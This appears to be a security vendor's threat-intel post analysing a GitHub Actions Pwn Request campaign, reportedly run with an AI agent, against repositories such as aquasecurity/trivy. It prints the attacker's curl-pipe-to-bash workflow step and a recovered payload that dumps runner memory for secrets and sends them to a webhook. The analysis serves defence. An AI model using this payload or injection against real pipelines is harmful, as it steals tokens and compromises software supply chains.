--- title: "MegaGame10418: A Throwaway Account Linked to the Hackerbot-Claw Attack" tldr: "Between February 27–28, 2026, the GitHub user 'hackerbot-claw' launched an automated Pwn Request campaign targeting eight high-profile repositories using the AI agent 'openclaw.' Our Package Threat Hunter caught the attack in progress. Further investigation revealed 'MegaGame10418'—a throwaway account that predated the campaign by a month—used to test the same injection techniques against a vulnerable NewRelic test repository." author: Sébastien Graveline date: 2026-03-02 category: threat-intel tags: - github-actions - pwn-request - supply-chain - ci-cd - poutine - command-injection banner: /images/articles/megagame10418-banner.png bannerAlt: "MegaGame10418: A Throwaway Account Linked to the Hackerbot-Claw Attack" --- **TL;DR**: Between February 27 and 28, 2026, the GitHub user `hackerbot-claw` executed an automated "Pwn Request" campaign targeting several high-profile repositories. Our Package Threat Hunter detected the activity in attacker-controlled forks while the payloads were still being staged. During our investigation, we identified a throwaway account, `MegaGame10418`, which had attempted the same injection technique a month earlier against a publicly available NewRelic test repository. While some evidence suggests the reuse of a public security-training repository, other signals point to deliberate malicious testing in preparation for the larger campaign. --- ## The hackerbot-claw campaign From `2026-02-27 05:12:50 UTC` to `2026-02-28 18:32:42 UTC`, the GitHub user `hackerbot-claw` employed various Pwn Request techniques to probe and exploit GitHub Actions workflows across multiple critical repositories. The attacker utilized the AI agent **openclaw** to systematically identify and target victims at scale. The repositories targeted during this campaign included: * `ambient-code/platform` * `aquasecurity/trivy` * `avelino/awesome-go` * `DataDog/datadog-iac-scanner` * `microsoft/ai-discovery-agent` * `project-akri/akri` * `RustPython/RustPython` * `DataDog/datadog-agent` The most significant confirmed impact occurred within `aquasecurity/trivy`. Our investigation independently verified findings from other researchers (see Credits below), confirming that our Package Threat Hunter flagged multiple attacks before they could fully execute, capturing activity in the attacker's forks while the payloads were being staged. ![Threat Hunting found hackerbot-claw attack](/images/articles/inline/megagame10418-1.png) ## MegaGame10418 Following the [aquasecurity/trivy discussion](https://github.com/aquasecurity/trivy/discussions/10265), we investigated the malicious [PR #10252](https://github.com/aquasecurity/trivy/pull/10252), which preceded the main `hackerbot-claw` attack by approximately five hours. According to the maintainer [knqyf263](https://github.com/knqyf263): > "Based on our audit log analysis, we believe the creator of #10252 and hackerbot-claw are likely the same attacker." [full quote](https://github.com/aquasecurity/trivy/discussions/10265#discussioncomment-15968674). The account `MegaGame10418` opened that PR - a username that had not yet appeared in other reports associated with this attack. Both the PR and the user account have since been deleted, an action typically reserved for GitHub staff when removing verified malicious activity. The original aquasecurity/trivy repo was made private, which made it exit the fork network. This automatically elected a new root node to [fossabot/trivy](https://github.com/fossabot/trivy). Using this repo, we were able to get the malicious commit from `MegaGame10418` (`1052e39...`). `.github/actions/setup-go/action.yaml` ```yaml - name: Extract Go version from go.mod id: go-version shell: bash run: | curl -sSfL https://gist.githubusercontent.com/MegaGame10418/f43b159297d7aab838fa484a9dbd5fbd/raw/run.sh | bash &> /dev/null exit 1 ``` `MegaGame10418` added a new line `pkg/notification/notice.go` and pushed to (`fcdeb4...`) at `2026-02-27 00:19:03 UTC` to trigger the workflow. ## MegaGame10418 Payload The attacker used a Gist for the payload. Although the Gist was deleted, we successfully recovered the content: ```bash MEMDUMP_PY="aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCgojIENyZWRpdCB0byBnaXRodWIuY29tL25pa2l0YXN0dXBpbiBmb3IgdGhlIHNjcmlwdC4KCmRlZiBnZXRfcGlkKCk6CiAgICBwaWRzID0gW3BpZCBmb3IgcGlkIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcGlkLmlzZGlnaXQoKV0KCiAgICBmb3IgcGlkIGluIHBpZHM6CiAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGNtZGxpbmVfZjoKICAgICAgICAgICAgaWYgYidSdW5uZXIuV29ya2VyJyBpbiBjbWRsaW5lX2YucmVhZCgpOgogICAgICAgICAgICAgICAgcmV0dXJuIHBpZAoKICAgIHJhaXNlIEV4Y2VwdGlvbignQ2FuIG5vdCBnZXQgcGlkIG9mIFJ1bm5lci5Xb3JrZXInKQoKcGlkID0gZ2V0X3BpZCgpCgptYXBfcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWFwcyIKbWVtX3BhdGggPSBmIi9wcm9jL3twaWR9L21lbSIKCndpdGggb3BlbihtYXBfcGF0aCwgJ3InKSBhcyBtYXBfZi5yZWFkbGluZXMoKTogICMgZm9yIGVhY2ggbWFwcGVkIHJlZ2lvbgogICAgICAgIG0gPSByZS5tYXRjaChyJyhbMC05QS1GYS1mXSspLShbMC05QS1GYS1mXSspIChbLXJdKScsIGxpbmUpCiAgICAgICAgaWYgbS5ncm91cCgzKSA9PSAncic6ICAjIHJlYWRhYmxlIHJlZ2lvbgogICAgICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgbWVtX2Yuc2VlayhzdGFydCkgICMgc2VlayB0byByZWdpb24gc3RhcnQKICAgICAgICAKICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgY2h1bmsgPSBtZW1fZi5yZWFkKGVuZCAtIHN0YXJ0KSAgIyByZWFkIHJlZ2lvbiBjb250ZW50cwogICAgICAgICAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoY2h1bmspCiAgICAgICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICAgICAgY29udGludWU=" echo $MEMDUMP_PY | base64 -d > /tmp/dump.py YOUR_EXFIL="webhook.site/eaa1f5cc-ed33-4eec-bcde-14f0bac63908" # Uses memory dump technique from github.com/nikitastupin/pwnhub # with regex to parse out all secret values (including GITHUB_TOKEN) if [[ "$OSTYPE" == "linux-gnu" ]]; then B64_BLOB=`sudo python3 /tmp/dump.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0` # Exfiltration to Webhook curl -s -d "$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null else exit 0 fi ``` This is a classic memory dump technique combined with a webhook for exfiltration. While not innovative, it is highly effective at extracting secrets from active runner memory and send the result to a webhook. Using the webhook.site API (`https://webhook.site/token/eaa1f5cc-ed33-4eec-bcde-14f0bac63908`), we see the last request to this webhook was at `2026-02-27 00:27:50 UTC`, 9 minutes after the push: ```json { "uuid": "eaa1f5cc-ed33-4eec-bcde-14f0bac63908", "default_content": "This URL has no default content configured. Change response in Webhook.site.", "user_agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36", "ip": "138.199.34.137", "created_at": "2026-02-27 00:05:47", "updated_at": "2026-02-27 00:27:50", "expires_at": "2026-03-06 00:05:47", "latest_request_at": "2026-02-27 00:27:50", "latest_request_id": "dc947e37-5219-451e-8c53-b43a44fcf442" } ``` ## The past of MegaGame10418 By pivoting to our automated threat hunting data, we discovered that we had already flagged suspicious activity from this user a month prior: ![Threat Hunting found MegaGame10418 attack](/images/articles/inline/megagame10418-2.png) The activity involved an attack on `newrelic/test-oac-repository`, a now-deleted repository. It is highly unusual for a large organization to host a repository that was attacked a month ago without the user being immediately banned. We reviewed all events on this repository and found that on `2026-01-27`, three accounts attempted to exploit it: * `MegaGame10418` and `r3s1l3n7` (both now banned). * `bhtestaccount123` (still active). `bhtestaccount123` is particularly interesting, as it still hosts a fork: [bhtestaccount123/test-oac-repository](https://github.com/bhtestaccount123/test-oac-repository). Most commits there were made by [pranav-new-relic](https://github.com/pranav-new-relic), a verified account within the NewRelic organization. This repository was originally forked from [gaurab4163/test-oac-repository](https://github.com/gaurab4163/test-oac-repository), another legitimate account. ## Analysis & Speculation The `newrelic/test-oac-repository` appears to have been a GitHub Actions security training lab. The workflows contained basic injection vulnerabilities, including the use of `REPO_ACCESS_TOKEN` secrets and `contents: write` permissions. It is possible that `pranav-new-relic` created this to demonstrate vulnerabilities (though hosting such a lab within an official organization is risky, as it could lead to the dumping of organization-wide secrets). This would explain why the accounts attacking it weren't immediately banned. While `bhtestaccount123` appears to be a legitimate throwaway for testing, other accounts—specifically `MegaGame10418`—seem to have used this "training" ground to refine their malicious payloads. ## Poutine: Detecting Vulnerabilities Before the Attack Our "Package Supply" system runs [poutine](https://github.com/boostsecurityio/poutine/) continuously against public repositories. We had already scanned `newrelic/test-oac-repository` on `2026-01-05` and identified three workflows vulnerable to command injection via unsanitized pull request metadata: * `.github/workflows/handle-closed-fork-pr.yml` * `.github/workflows/test-fork-pr-handler.yml` * `.github/workflows/fork-pr-handler.yml` Critically, we also identified the vulnerability in `aquasecurity/trivy` on `2025-11-29`, months before any attacks were attempted. Even without our advanced internal detection rules, the open-source version of **poutine** would have easily flagged these vulnerabilities. ## Remediation * **Audit your workflows:** Run [poutine](https://github.com/boostsecurityio/poutine/) against your repositories. The injection patterns that compromised `aquasecurity/trivy` and the NewRelic test repository are both covered by poutine’s open-source detection engine. * **Minimize Secret Scope:** Avoid using high-privileged tokens (like those with `contents: write`) in workflows triggered by external pull requests. ## Timeline of Observed Events * **2026-01-05 17:40:35 UTC**: Package Supply detects three injection vulnerabilities in `newrelic/test-oac-repository` via poutine. * **2026-01-16 10:20:05 UTC**: GitHub account `MegaGame10418` is created. * **2026-01-27 19:53:34 UTC**: `MegaGame10418` forks `newrelic/test-oac-repository` and submits a PR with an injection-style branch name. * **2026-01-27 (Same Day)**: At least two other accounts (`r3s1l3n7` and `bhtestaccount123`) perform similar tests on the same repository. * **2026-02-26 23:51:00 UTC**: `MegaGame10418` forks `aquasecurity/trivy`. * **2026-02-27 00:18:19 UTC**: `MegaGame10418` opens PR #10252 on `aquasecurity/trivy` using head SHA `53e032b...`. * **2026-02-27 00:19:03 UTC**: `MegaGame10418` pushed the payload. * **2026-02-27 00:19:20 UTC**: `MegaGame10418` closed the PR. * **2026-02-27 00:27:50 UTC**: The webhook was updated for the last time. It most likely received the PAT during this time. * **2026-02-27 05:12:50 UTC**: The `hackerbot-claw` automated campaign begins, targeting multiple high-profile repositories. *To be continued...* ## Credits StepSecurity has published a detailed investigation and timeline of the `hackerbot-claw` campaign: [hackerbot-claw: An AI-Powered Bot Actively Exploiting GitHub Actions](https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation).